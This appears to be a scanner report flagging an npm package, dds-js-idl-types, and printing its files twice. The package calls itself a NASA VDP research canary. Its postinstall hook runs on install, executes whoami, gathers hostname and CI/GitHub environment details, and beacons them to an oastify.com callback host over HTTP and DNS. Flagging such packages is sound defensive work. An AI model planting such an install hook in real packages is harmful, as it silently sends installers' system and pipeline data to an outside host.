// offending code· 1 file flaggedpatterns: 5
--- install scripts ---
### postinstall
node postinstall.js
--- package/postinstall.js (excerpt) ---
const https = require('https');
const os = require('os');
const { execSync } = require('child_process');
// Replace with your interactsh/canarytoken URL
const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com/nasa/dds-js-canary/';
function get(cmd) {
try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
catch { return 'error'; }
}
const payload = {
whoami: get('whoami'),
hostname: os.hostname(),
platform: os.platform(),
cwd: process.cwd(),
// grab env vars that leak CI/CD context — non-sensitive ones
ci: process.env.CI || '',
github: process.env.GITHUB_REPOSITORY || '',
node_env: process.env.NODE_ENV || '',
};
const path = '/beacon?' + new URLSearchParams(payload).toString();
// HTTP beacon (shows up in interactsh logs with source IP)
https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});
// DNS beacon as fallback (works even if HTTP is firewalled)
require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});
--- package.json (entry) ---
{
"name": "dds-js-idl-types",
"version": "1.0.0",
"description": "Security research canary — NASA VDP",
"scripts": {
"postinstall": "node postinstall.js"
},
"main": "postinstall.js",
"bin": {
"dds-js-idl-types": "postinstall.js"
}
}
--- postinstall.js (entry) ---
const https = require('https');
const os = require('os');
const { execSync } = require('child_process');
// Replace with your interactsh/canarytoken URL
const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com/nasa/dds-js-canary/';
function get(cmd) {
try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
catch { return 'error'; }
}
const payload = {
whoami: get('whoami'),
hostname: os.hostname(),
platform: os.platform(),
cwd: process.cwd(),
// grab env vars that leak CI/CD context — non-sensitive ones
ci: process.env.CI || '',
github: process.env.GITHUB_REPOSITORY || '',
node_env: process.env.NODE_ENV || '',
};
const path = '/beacon?' + new URLSearchParams(payload).toString();
// HTTP beacon (shows up in interactsh logs with source IP)
https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});
// DNS beacon as fallback (works even if HTTP is firewalled)
require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});